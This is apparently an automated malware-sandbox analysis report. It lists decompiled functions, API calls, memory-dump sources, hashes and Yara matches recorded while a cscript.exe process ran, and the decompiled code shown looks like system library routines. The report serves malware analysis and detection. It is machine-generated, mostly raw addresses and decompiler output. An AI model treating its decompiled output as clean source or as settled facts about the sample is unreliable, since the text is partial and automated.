                                                        0x00b6ec2a
                                                        0x00b6ec2d
                                                        0x00b6ec33
                                                        0x00b6ec36
                                                        0x00b6ec3a
                                                        0x00b6ec3e
                                                        0x00b6ec40
                                                        0x00b6ec47
                                                        0x00b6ec47
                                                        0x00b6ec40
                                                        0x00b422c6
                                                        0x00b6ebc1
                                                        0x00b6ebc1
                                                        0x00b6ebc5
                                                        0x00b6ec9a
                                                        0x00b6ec9a
                                                        0x00b6ebd6
                                                        0x00b6ebd6
                                                        0x00000000
                                                        0x00b6ebbb
                                                        0x00ba2477
                                                        0x00ba247c
                                                        0x00ba2486
                                                        0x00ba248b
                                                        0x00ba2496
                                                        0x00ba249b
                                                        0x00ba249d
                                                        0x00ba24a0
                                                        0x00ba24a3
                                                        0x00ba24aa
                                                        0x00ba24aa
                                                        0x00ba24a5
                                                        0x00ba24a5
                                                        0x00ba24a5
                                                        0x00ba24ac
                                                        0x00ba24af
                                                        0x00ba24b0
                                                        0x00ba24b3
                                                        0x00ba24b9
                                                        0x00ba24ba
                                                        0x00ba24bb
                                                        0x00ba24c6
                                                        0x00ba24cb
                                                        0x00ba24cd
                                                        0x00ba24d0
                                                        0x00ba24d1
                                                        0x00ba24d4
                                                        0x00ba24d6
                                                        0x00ba24d9
                                                        0x00ba24d9
                                                        0x00ba24dc
                                                        0x00ba24df
                                                        0x00ba24e1
                                                        0x00ba24e7
                                                        0x00ba24e9
                                                        0x00ba24ec
                                                        0x00ba24ef
                                                        0x00ba24f2
                                                        0x00ba24f2
                                                        0x00ba24ef
                                                        0x00ba24e7
                                                        0x00ba24fa
                                                        0x00ba24ff
                                                        0x00ba2501
                                                        0x00ba2503
                                                        0x00ba2506
                                                        0x00ba250b
                                                        0x00b6eb8c
                                                        0x00b6eb93
                                                        0x00000000
                                                        0x00000000
                                                        0x00b6eb93
                                                        0x00000000
                                                        0x00b6eb99
                                                        0x00b6ec85
                                                        0x00b6ec85
                                                        0x00b6ec85
                                                        0x00000000

                                                        Strings
                                                        • RTL: Re-Waiting, xrefs: 00BA24FA
                                                        • RTL: Enter Critical Section Timeout (%I64u secs) %d, xrefs: 00BA248D
                                                        • RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu, xrefs: 00BA24BD
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.541893417.0000000000B30000.00000040.00000001.sdmp, Offset: 00B20000, based on PE: true
                                                        • Associated: 0000000B.00000002.541859378.0000000000B20000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542443702.0000000000C10000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542456721.0000000000C20000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542476481.0000000000C24000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542501441.0000000000C27000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542519253.0000000000C30000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542572972.0000000000C90000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID:
                                                        • String ID: RTL: Enter Critical Section Timeout (%I64u secs) %d$RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu$RTL: Re-Waiting
                                                        • API String ID: 0-3177188983
                                                        • Opcode ID: c88c6a3913eb58f4c8c219d573805429d47886b2237742f5fde63de770a327bc
                                                        • Instruction ID: 8caa7a34571428725caaf516ab4cd1ad3a7d44c9cbfd2dca76bfe5f6739d8642
                                                        • Opcode Fuzzy Hash: c88c6a3913eb58f4c8c219d573805429d47886b2237742f5fde63de770a327bc
                                                        • Instruction Fuzzy Hash: 1641E570A04204AFDB24EB68CCC5F6A77E8EF49720F208695F6659B3D1D734EA41C761
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00B7FCC9, Relevance: 6.3, APIs: 4, Instructions: 257COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 100%
                                                        			E00B7FCC9(signed short* _a4, char _a7, signed short** _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _t105;
				void* _t110;
				char _t114;
				short _t115;
				void* _t118;
				signed short* _t119;
				short _t120;
				char _t122;
				void* _t127;
				void* _t130;
				signed int _t136;
				intOrPtr _t143;
				signed int _t158;
				signed short* _t164;
				signed int _t167;
				void* _t170;

				_t158 = 0;
				_t164 = _a4;
				_v20 = 0;
				_v24 = 0;
				_v8 = 0;
				_v12 = 0;
				_v16 = 0;
				_v28 = 0;
				_t136 = 0;
				while(1) {
					_t167 =  *_t164 & 0x0000ffff;
					if(_t167 == _t158) {
						break;
					}
					_t118 = _v20 - _t158;
					if(_t118 == 0) {
						if(_t167 == 0x3a) {
							if(_v12 > _t158 || _v8 > _t158) {
								break;
							} else {
								_t119 =  &(_t164[1]);
								if( *_t119 != _t167) {
									break;
								}
								_t143 = 2;
								 *((short*)(_a12 + _t136 * 2)) = 0;
								_v28 = 1;
								_v8 = _t143;
								_t136 = _t136 + 1;
								L47:
								_t164 = _t119;
								_v20 = _t143;
								L14:
								if(_v24 == _t158) {
									L19:
									_t164 =  &(_t164[1]);
									_t158 = 0;
									continue;
								}
								if(_v12 == _t158) {
									if(_v16 > 4) {
										L29:
										return 0xc000000d;
									}
									_t120 = E00B7EE02(_v24, _t158, 0x10);
									_t170 = _t170 + 0xc;
									 *((short*)(_a12 + _t136 * 2)) = _t120;
									_t136 = _t136 + 1;
									goto L19;
								}
								if(_v16 > 3) {
									goto L29;
								}
								_t122 = E00B7EE02(_v24, _t158, 0xa);
								_t170 = _t170 + 0xc;
								if(_t122 > 0xff) {
									goto L29;
								}
								 *((char*)(_v12 + _t136 * 2 + _a12 - 1)) = _t122;
								goto L19;
							}
						}
						L21:
						if(_v8 > 7 || _t167 >= 0x80) {
							break;
						} else {
							if(E00B7685D(_t167, 4) == 0) {
								if(E00B7685D(_t167, 0x80) != 0) {
									if(_v12 > 0) {
										break;
									}
									_t127 = 1;
									_a7 = 1;
									_v24 = _t164;
									_v20 = 1;
									_v16 = 1;
									L36:
									if(_v20 == _t127) {
										goto L19;
									}
									_t158 = 0;
									goto L14;
								}
								break;
							}
							_a7 = 0;
							_v24 = _t164;
							_v20 = 1;
							_v16 = 1;
							goto L19;
						}
					}
					_t130 = _t118 - 1;
					if(_t130 != 0) {
						if(_t130 == 1) {
							goto L21;
						}
						_t127 = 1;
						goto L36;
					}
					if(_t167 >= 0x80) {
						L7:
						if(_t167 == 0x3a) {
							_t158 = 0;
							if(_v12 > 0 || _v8 > 6) {
								break;
							} else {
								_t119 =  &(_t164[1]);
								if( *_t119 != _t167) {
									_v8 = _v8 + 1;
									L13:
									_v20 = _t158;
									goto L14;
								}
								if(_v28 != 0) {
									break;
								}
								_v28 = _v8 + 1;
								_t143 = 2;
								_v8 = _v8 + _t143;
								goto L47;
							}
						}
						if(_t167 != 0x2e || _a7 != 0 || _v12 > 2 || _v8 > 6) {
							break;
						} else {
							_v12 = _v12 + 1;
							_t158 = 0;
							goto L13;
						}
					}
					if(E00B7685D(_t167, 4) != 0) {
						_v16 = _v16 + 1;
						goto L19;
					}
					if(E00B7685D(_t167, 0x80) != 0) {
						_v16 = _v16 + 1;
						if(_v12 > 0) {
							break;
						}
						_a7 = 1;
						goto L19;
					}
					goto L7;
				}
				 *_a8 = _t164;
				if(_v12 != 0) {
					if(_v12 != 3) {
						goto L29;
					}
					_v8 = _v8 + 1;
				}
				if(_v28 != 0 || _v8 == 7) {
					if(_v20 != 1) {
						if(_v20 != 2) {
							goto L29;
						}
						 *((short*)(_a12 + _t136 * 2)) = 0;
						L65:
						_t105 = _v28;
						if(_t105 != 0) {
							_t98 = (_t105 - _v8) * 2; // 0x11
							E00B58980(_a12 + _t98 + 0x10, _a12 + _t105 * 2, _v8 - _t105 + _v8 - _t105);
							_t110 = 8;
							E00B4DFC0(_a12 + _t105 * 2, 0, _t110 - _v8 + _t110 - _v8);
						}
						return 0;
					}
					if(_v12 != 0) {
						if(_v16 > 3) {
							goto L29;
						}
						_t114 = E00B7EE02(_v24, 0, 0xa);
						_t170 = _t170 + 0xc;
						if(_t114 > 0xff) {
							goto L29;
						}
						 *((char*)(_v12 + _t136 * 2 + _a12)) = _t114;
						goto L65;
					}
					if(_v16 > 4) {
						goto L29;
					}
					_t115 = E00B7EE02(_v24, 0, 0x10);
					_t170 = _t170 + 0xc;
					 *((short*)(_a12 + _t136 * 2)) = _t115;
					goto L65;
				} else {
					goto L29;
				}
			}

























                                                        0x00b7fcd1
                                                        0x00b7fcd6
                                                        0x00b7fcd9
                                                        0x00b7fcdc
                                                        0x00b7fcdf
                                                        0x00b7fce2
                                                        0x00b7fce5
                                                        0x00b7fce8
                                                        0x00b7fceb
                                                        0x00b7fced
                                                        0x00b7fced
                                                        0x00b7fcf3
                                                        0x00000000
                                                        0x00000000
                                                        0x00b7fcfc
                                                        0x00b7fcfe
                                                        0x00b7fdc1
                                                        0x00baecbd
                                                        0x00000000
                                                        0x00baeccc
                                                        0x00baeccc
                                                        0x00baecd2
                                                        0x00000000
                                                        0x00000000
                                                        0x00baecdf
                                                        0x00baece0
                                                        0x00baece4
                                                        0x00baeceb
                                                        0x00baecee
                                                        0x00baeca8
                                                        0x00baeca8
                                                        0x00baecaa
                                                        0x00b7fd76
                                                        0x00b7fd79
                                                        0x00b7fdb4
                                                        0x00b7fdb5
                                                        0x00b7fdb6
                                                        0x00000000
                                                        0x00b7fdb6
                                                        0x00b7fd7e
                                                        0x00baecfc
                                                        0x00b7fe2f
                                                        0x00000000
                                                        0x00b7fe2f
                                                        0x00baed08
                                                        0x00baed0f
                                                        0x00baed17
                                                        0x00baed1b
                                                        0x00000000
                                                        0x00baed1b
                                                        0x00b7fd88
                                                        0x00000000
                                                        0x00000000
                                                        0x00b7fd94
                                                        0x00b7fd99
                                                        0x00b7fda1
                                                        0x00000000
                                                        0x00000000
                                                        0x00b7fdb0
                                                        0x00000000
                                                        0x00b7fdb0
                                                        0x00baecbd
                                                        0x00b7fdc7
                                                        0x00b7fdcb
                                                        0x00000000
                                                        0x00b7fdd7
                                                        0x00b7fde3
                                                        0x00b7fe06
                                                        0x00b91fe7
                                                        0x00000000
                                                        0x00000000
                                                        0x00b91fef
                                                        0x00b91ff0
                                                        0x00b91ff4
                                                        0x00b91ff7
                                                        0x00b91ffa
                                                        0x00b91ffd
                                                        0x00b92000
                                                        0x00000000
                                                        0x00000000
                                                        0x00baecf1
                                                        0x00000000
                                                        0x00baecf1
                                                        0x00000000
                                                        0x00b7fe06
                                                        0x00b7fde8
                                                        0x00b7fdec
                                                        0x00b7fdef
                                                        0x00b7fdf2
                                                        0x00000000
                                                        0x00b7fdf2
                                                        0x00b7fdcb
                                                        0x00b7fd04
                                                        0x00b7fd05
                                                        0x00baec67
                                                        0x00000000
                                                        0x00000000
                                                        0x00baec6f
                                                        0x00000000
                                                        0x00baec6f
                                                        0x00b7fd13
                                                        0x00b7fd3c
                                                        0x00b7fd40
                                                        0x00baec75
                                                        0x00baec7a
                                                        0x00000000
                                                        0x00baec8a
                                                        0x00baec8a
                                                        0x00baec90
                                                        0x00baecb2
                                                        0x00b7fd73
                                                        0x00b7fd73
                                                        0x00000000
                                                        0x00b7fd73
                                                        0x00baec95
                                                        0x00000000
                                                        0x00000000
                                                        0x00baeca1
                                                        0x00baeca4
                                                        0x00baeca5
                                                        0x00000000
                                                        0x00baeca5
                                                        0x00baec7a
                                                        0x00b7fd4a
                                                        0x00000000
                                                        0x00b7fd6e
                                                        0x00b7fd6e
                                                        0x00b7fd71
                                                        0x00000000
                                                        0x00b7fd71
                                                        0x00b7fd4a
                                                        0x00b7fd21
                                                        0x00b8a3a1
                                                        0x00000000
                                                        0x00b8a3a1
                                                        0x00b7fd36
                                                        0x00b9200b
                                                        0x00b92012
                                                        0x00000000
                                                        0x00000000
                                                        0x00b92018
                                                        0x00000000
                                                        0x00b92018
                                                        0x00000000
                                                        0x00b7fd36
                                                        0x00b7fe0f
                                                        0x00b7fe16
                                                        0x00b8a3ad
                                                        0x00000000
                                                        0x00000000
                                                        0x00b8a3b3
                                                        0x00b8a3b3
                                                        0x00b7fe1f
                                                        0x00baed25
                                                        0x00baed86
                                                        0x00000000
                                                        0x00000000
                                                        0x00baed91
                                                        0x00baed95
                                                        0x00baed95
                                                        0x00baed9a
                                                        0x00baedad
                                                        0x00baedb3
                                                        0x00baedba
                                                        0x00baedc4
                                                        0x00baedc9
                                                        0x00000000
                                                        0x00baedcc
                                                        0x00baed2a
                                                        0x00baed55
                                                        0x00000000
                                                        0x00000000
                                                        0x00baed61
                                                        0x00baed66
                                                        0x00baed6e
                                                        0x00000000
                                                        0x00000000
                                                        0x00baed7d
                                                        0x00000000
                                                        0x00baed7d
                                                        0x00baed30
                                                        0x00000000
                                                        0x00000000
                                                        0x00baed3c
                                                        0x00baed43
                                                        0x00baed4b
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.541893417.0000000000B30000.00000040.00000001.sdmp, Offset: 00B20000, based on PE: true
                                                        • Associated: 0000000B.00000002.541859378.0000000000B20000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542443702.0000000000C10000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542456721.0000000000C20000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542476481.0000000000C24000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542501441.0000000000C27000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542519253.0000000000C30000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542572972.0000000000C90000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID: __fassign
                                                        • String ID:
                                                        • API String ID: 3965848254-0
                                                        • Opcode ID: cf2859dc65627fbf80b6c0eada531fd5cb93d2a8787631212c3d4041a421bf55
                                                        • Instruction ID: b10ae6383ec1f18518718b6ebb57ce6c9f72569b91cc4fc43e41503ed78a37c2
                                                        • Opcode Fuzzy Hash: cf2859dc65627fbf80b6c0eada531fd5cb93d2a8787631212c3d4041a421bf55
                                                        • Instruction Fuzzy Hash: DD918D31D0420AEBDF24DF98C8456BEB7F4EF55314F20C4FAD469A6162E7309A81CB99
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00B6B7D3, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 57COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 44%
                                                        			E00B6B7D3(void* __ecx, void* __edx, void* __eflags) {
				signed int _v8;
				signed int _v12;
				signed int __ebx;
				void* __edi;
				void* __esi;
				void* _t21;
				void* _t24;
				void* _t25;
				void* _t27;

				_t24 = __edx;
				_t23 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_push(0);
				_push(4);
				_push( &_v12);
				_push(0x24);
				_t19 = E00B3FAE8(0xffffffff);
				if(_t19 < 0) {
					_push(_t19);
					E00B83915(_t21, _t23, _t24, _t25, _t27, __eflags);
					asm("int3");
					_t19 = 0xc0000001;
					return 0xc0000001;
				} else {
					_t2 =  &_v8;
					 *_t2 = _v8 & 0x00000000;
					__eflags =  *_t2;
					__eax = _v12;
					_push(__ebx);
					_push(__esi);
					__ebx = 0x7fffffed;
					_push(__edi);
					_t5 = __ebx - 0x2a; // 0x7fffffc3
					__edi = _t5;
					_t6 = __ebx + 0x12; // 0x7fffffff
					__esi = _t6;
					do {
						__ecx = 0x7fffffed;
						__edx = __eax * 0x7fffffed >> 0x20;
						__eax = __eax + __edi;
						asm("adc edx, 0x0");
						__eax = E00B613F0(__eax, __edx, __esi, 0);
						__ecx = _v8;
						_v8 = _v8 + 4;
						__eflags = _v8 - 0x200;
						 *(_v8 + 0xc24f20) = __eax;
					} while (_v8 < 0x200);
					__edx = __eax * 0x7fffffed >> 0x20;
					__eax = __eax + __edi;
					asm("adc edx, 0x0");
					__eax = E00B613F0(__eax, __edx, __esi, 0);
					_pop(__edi);
					 *0xc20124 = __eax;
					__eax = 0;
					_pop(__esi);
					__eax = 1;
					__eflags = 1;
					_pop(__ebx);
					return 1;
				}
			}












                                                        0x00b6b7d3
                                                        0x00b6b7d3
                                                        0x00b6b7d8
                                                        0x00b6b7d9
                                                        0x00b6b7da
                                                        0x00b6b7dc
                                                        0x00b6b7e1
                                                        0x00b6b7e2
                                                        0x00b6b7e6
                                                        0x00b6b7ed
                                                        0x00bb0d1f
                                                        0x00bb0d20
                                                        0x00bb0d25
                                                        0x00bb0d26
                                                        0x00b581c8
                                                        0x00b6b7f3
                                                        0x00b6b7f3
                                                        0x00b6b7f3
                                                        0x00b6b7f3
                                                        0x00b6b7f7
                                                        0x00b6b7fa
                                                        0x00b6b7fb
                                                        0x00b6b7fc
                                                        0x00b6b801
                                                        0x00b6b802
                                                        0x00b6b802
                                                        0x00b6b805
                                                        0x00b6b805
                                                        0x00b6b808
                                                        0x00b6b808
                                                        0x00b6b80a
                                                        0x00b6b80e
                                                        0x00b6b811
                                                        0x00b6b816
                                                        0x00b6b81b
                                                        0x00b6b81e
                                                        0x00b6b822
                                                        0x00b6b829
                                                        0x00b6b829
                                                        0x00b6b831
                                                        0x00b6b835
                                                        0x00b6b838
                                                        0x00b6b83d
                                                        0x00b6b842
                                                        0x00b6b843
                                                        0x00b6b848
                                                        0x00b6b84a
                                                        0x00b6b84b
                                                        0x00b6b84b
                                                        0x00b6b84c
                                                        0x00b6b84e
                                                        0x00b6b84e

                                                        APIs
                                                          • Part of subcall function 00B3FAE8: LdrInitializeThunk.NTDLL ref: 00B3FAF3
                                                        • __aullrem.LIBCMT ref: 00B6B816
                                                        • __aullrem.LIBCMT ref: 00B6B83D
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.541893417.0000000000B30000.00000040.00000001.sdmp, Offset: 00B20000, based on PE: true
                                                        • Associated: 0000000B.00000002.541859378.0000000000B20000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542443702.0000000000C10000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542456721.0000000000C20000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542476481.0000000000C24000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542501441.0000000000C27000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542519253.0000000000C30000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542572972.0000000000C90000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID: __aullrem$InitializeThunk
                                                        • String ID: [A=
                                                        • API String ID: 241165383-4002878675
                                                        • Opcode ID: 51a7cd5a63fd7b13a8e8a8f5e0b9c1614b6f5464636e33419f23d4c46ffd8481
                                                        • Instruction ID: 2a3418f7a44d0eee95adac922cfad429902b0462219e29b4be743e50e4925973
                                                        • Opcode Fuzzy Hash: 51a7cd5a63fd7b13a8e8a8f5e0b9c1614b6f5464636e33419f23d4c46ffd8481
                                                        • Instruction Fuzzy Hash: 9901D8B2A04204BFFB14DB98CC4AFAF76FDDB85718F240199B611EB5C1E6B4AD018764
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Analysis Process: cscript.exe PID: 2816 Parent PID: 1764 cscript.exeCOMMON

                                                        Executed Functions

                                                        Function 0008A360, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40filenativeCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • NtCreateFile.NTDLL(00000060,00000000,.z`,00084BB7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,00084BB7,007A002E,00000000,00000060,00000000,00000000), ref: 0008A3AD
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.687211832.0000000000070000.00000040.00020000.sdmp, Offset: 00070000, based on PE: false
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CreateFile
                                                        • String ID: .z`
                                                        • API String ID: 823142352-1441809116
                                                        • Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                        • Instruction ID: 33aa133b1828de7a33f34ff2abfb8f4a657c94ad4ae741a971a1f8b17fb592ea
                                                        • Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                        • Instruction Fuzzy Hash: 17F0BDB2200208ABCB08DF88DC85EEB77ADAF8C754F158248BA0D97241C630E8118BA4
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0008A35A, Relevance: 1.6, APIs: 1, Instructions: 76filenativeCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • NtReadFile.NTDLL(00084D72,5EB65239,FFFFFFFF,00084A31,?,?,00084D72,?,00084A31,FFFFFFFF,5EB65239,00084D72,?,00000000), ref: 0008A455
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.687211832.0000000000070000.00000040.00020000.sdmp, Offset: 00070000, based on PE: false
                                                        Yara matches
                                                        Similarity
                                                        • API ID: FileRead
                                                        • String ID:
                                                        • API String ID: 2738559852-0
                                                        • Opcode ID: eab6c33f23b55d13730f8a1bb79f868c5d922428d3f24a8a171e60897e531aec
                                                        • Instruction ID: fcef1ac85d36dc38eeec39f5fcd415ae08c9ea63f69a6f46d4892c2a72869059
                                                        • Opcode Fuzzy Hash: eab6c33f23b55d13730f8a1bb79f868c5d922428d3f24a8a171e60897e531aec
                                                        • Instruction Fuzzy Hash: AB21F4B6204108AFDB08DF98DC90DEB73A9FF8C714B15825AFA4D97241D630E8118BA4
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0008A410, Relevance: 1.5, APIs: 1, Instructions: 36filenativeCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • NtReadFile.NTDLL(00084D72,5EB65239,FFFFFFFF,00084A31,?,?,00084D72,?,00084A31,FFFFFFFF,5EB65239,00084D72,?,00000000), ref: 0008A455
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.687211832.0000000000070000.00000040.00020000.sdmp, Offset: 00070000, based on PE: false
                                                        Yara matches
                                                        Similarity
                                                        • API ID: FileRead
                                                        • String ID:
                                                        • API String ID: 2738559852-0
                                                        • Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                                        • Instruction ID: 9146610a82c7d28884839af937c71fe69ddc05b2b6cb9a8e0f7e58f84478092f
                                                        • Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                                        • Instruction Fuzzy Hash: 28F0A4B2200208ABDB14DF89DC81EEB77ADEF8C754F158259BA1D97241D630E8118BA0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0008A48A, Relevance: 1.5, APIs: 1, Instructions: 35nativeCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • NtClose.NTDLL(00084D50,?,?,00084D50,00000000,FFFFFFFF), ref: 0008A4B5
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.687211832.0000000000070000.00000040.00020000.sdmp, Offset: 00070000, based on PE: false
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Close
                                                        • String ID:
                                                        • API String ID: 3535843008-0
                                                        • Opcode ID: 411769a3e80819cae2d2dc14c90e252633aadd9aa83bf34a4d9b3a106ac9d8b6
                                                        • Instruction ID: 391b59a6037747a6ba5b7afb0432f9722d10277a979745f982ff5c050fc02cc3
                                                        • Opcode Fuzzy Hash: 411769a3e80819cae2d2dc14c90e252633aadd9aa83bf34a4d9b3a106ac9d8b6
                                                        • Instruction Fuzzy Hash: D5F05EB6300114ABD720EF98DC80EEB73A9FF88720F248559FA489B241C630E91087A0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0008A540, Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,00072D11,00002000,00003000,00000004), ref: 0008A579
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.687211832.0000000000070000.00000040.00020000.sdmp, Offset: 00070000, based on PE: false
                                                        Yara matches
                                                        Similarity
                                                        • API ID: AllocateMemoryVirtual
                                                        • String ID:
                                                        • API String ID: 2167126740-0
                                                        • Opcode ID: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                                        • Instruction ID: bc206d9f2071b923372039f064e3137b2ea009f243bd174e6cd940b4fb91c3e0
                                                        • Opcode Fuzzy Hash: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                                        • Instruction Fuzzy Hash: 27F015B2200208ABDB14DF89CC81EEB77ADEF88754F118159BE0897242C630F810CBA0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0008A490, Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • NtClose.NTDLL(00084D50,?,?,00084D50,00000000,FFFFFFFF), ref: 0008A4B5
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.687211832.0000000000070000.00000040.00020000.sdmp, Offset: 00070000, based on PE: false
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Close
                                                        • String ID:
                                                        • API String ID: 3535843008-0
                                                        • Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                                        • Instruction ID: 8da779fb4580b145d932e8e32d90a0ec373589454ed40f45412f1b399caffab5
                                                        • Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                                        • Instruction Fuzzy Hash: F0D012752002146BD710EBD8CC45ED7775CEF44750F154455BA585B242C530F50087E0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 022D00C4, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.688194486.00000000022C0000.00000040.00000001.sdmp, Offset: 022B0000, based on PE: true
                                                        • Associated: 0000000D.00000002.688187161.00000000022B0000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000D.00000002.688305042.00000000023A0000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000D.00000002.688312609.00000000023B0000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000D.00000002.688320304.00000000023B4000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000D.00000002.688327822.00000000023B7000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000D.00000002.688335301.00000000023C0000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000D.00000002.688370384.0000000002420000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        • Opcode ID: 4bff211391be707d7e89478abb6bff82e3a2567f710e9bf85143fd517881f32a
                                                        • Instruction ID: e6c77262f5ba2182d122b5874ee39bb292c5f7eee28c199429390ea98cabeb31
                                                        • Opcode Fuzzy Hash: 4bff211391be707d7e89478abb6bff82e3a2567f710e9bf85143fd517881f32a
                                                        • Instruction Fuzzy Hash: 79B01272100940C7E309D724DD06F4B7210FFC0F01F008A3EA00B81851DA38A93CC846
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 022D07AC, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.688194486.00000000022C0000.00000040.00000001.sdmp, Offset: 022B0000, based on PE: true
                                                        • Associated: 0000000D.00000002.688187161.00000000022B0000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000D.00000002.688305042.00000000023A0000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000D.00000002.688312609.00000000023B0000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000D.00000002.688320304.00000000023B4000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000D.00000002.688327822.00000000023B7000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000D.00000002.688335301.00000000023C0000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000D.00000002.688370384.0000000002420000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        • Opcode ID: 154562b1c1044579d2961e918a12e94c940bf0a0b9e8e44222bba29e99ad0489
                                                        • Instruction ID: cdb92b4df541c6703467cf01e2fb590a315ac15b2f911c24ec3250dccee83ae6
                                                        • Opcode Fuzzy Hash: 154562b1c1044579d2961e918a12e94c940bf0a0b9e8e44222bba29e99ad0489
                                                        • Instruction Fuzzy Hash: 64B01272200540C7E3099724D906B4B7310FB80F00F008D3AE04781892DB78992CD487
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 022CFAB8, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.688194486.00000000022C0000.00000040.00000001.sdmp, Offset: 022B0000, based on PE: true
                                                        • Associated: 0000000D.00000002.688187161.00000000022B0000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000D.00000002.688305042.00000000023A0000.00000040.00000001.sdmp Download File
